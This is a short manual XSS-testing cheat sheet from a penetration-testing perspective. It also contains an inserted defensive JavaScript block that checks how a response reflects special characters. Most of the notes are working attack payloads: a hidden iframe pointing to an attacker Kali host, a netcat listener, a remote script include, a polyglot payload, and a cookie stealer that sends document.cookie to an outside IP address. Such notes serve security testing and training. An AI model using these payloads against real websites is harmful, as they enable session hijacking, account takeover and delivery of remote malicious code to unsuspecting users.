XSS manual testing
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
#Special characters that indicate the possibility of XSS
< > ' " { } ;
hello";<>
Try:
<script>alert('XSS')</script> #careful with the single quotes: check the font has not turned them into curly quotes
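A defender-side check for the probe above, as an added example that is not part of the original notes: for each of the special characters listed, it reports whether a response echoed it raw, HTML-encoded or not at all. The marker strings `zq7x`/`zq7y`, the function names and both sample pages are constructed for illustration.

```javascript
// Added example, not from the original notes. Marker strings and sample pages are constructed.
const PROBE_CHARS = ['<', '>', "'", '"', '{', '}', ';'];
const ENTITY = /&(#x[0-9a-f]{1,5}|#\d{1,6}|[a-z]+);/gi;
const NAMED = { lt: '<', gt: '>', quot: '"', apos: "'", amp: '&' };

// Output encoding for HTML element content and quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Turn the inside of one entity ("lt", "#39", "#x27") back into its character.
function decodeEntity(name) {
  if (/^#x/i.test(name)) return String.fromCodePoint(parseInt(name.slice(2), 16));
  if (name[0] === '#') return String.fromCodePoint(parseInt(name.slice(1), 10));
  return NAMED[name.toLowerCase()] ?? '';
}

// Classify each probe character found between the two markers in a response
// body as 'raw', 'encoded' (came back as an HTML entity) or 'stripped'.
function classifyReflection(body, start = 'zq7x', end = 'zq7y') {
  const from = body.indexOf(start);
  const to = from === -1 ? -1 : body.indexOf(end, from + start.length);
  if (to === -1) return null; // marker pair not reflected at all
  const segment = body.slice(from + start.length, to);
  const raw = segment.replace(ENTITY, ''); // what is left once entities are removed
  const encoded = [...segment.matchAll(ENTITY)].map((m) => decodeEntity(m[1])).join('');
  const result = {};
  for (const c of PROBE_CHARS) {
    result[c] = raw.includes(c) ? 'raw' : encoded.includes(c) ? 'encoded' : 'stripped';
  }
  return result;
}

const probe = 'zq7x' + PROBE_CHARS.join('') + 'zq7y';
const unsafePage = `<p>Results for ${probe}</p>`;            // constructed: echoed as-is
const safePage = `<p>Results for ${escapeHtml(probe)}</p>`; // constructed: encoded on output

console.log(classifyReflection(unsafePage));
console.log(classifyReflection(safePage));
```

On the encoded page `{`, `}` and `;` still come back raw, which is harmless in element content. A value reflected inside a `<script>` block or a client-side template needs encoding for that context instead.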
#Content injection: redirecting the user to malicious content
Embed an iframe within HTML code:
<iframe src=http://$KaliIP:80/report height='0' width='0'></iframe>
#netcat listener on port 80
nc -nvlp 80
#Submit the XSS payload through some login form / blog / query tab
#Shell
#Steal PHP session ID
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
#Polyglot XSS payload
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
#Cookie stealer
<script>new Image().src="http://11.11.11.11/cool.jpg?output="+document.cookie;</script>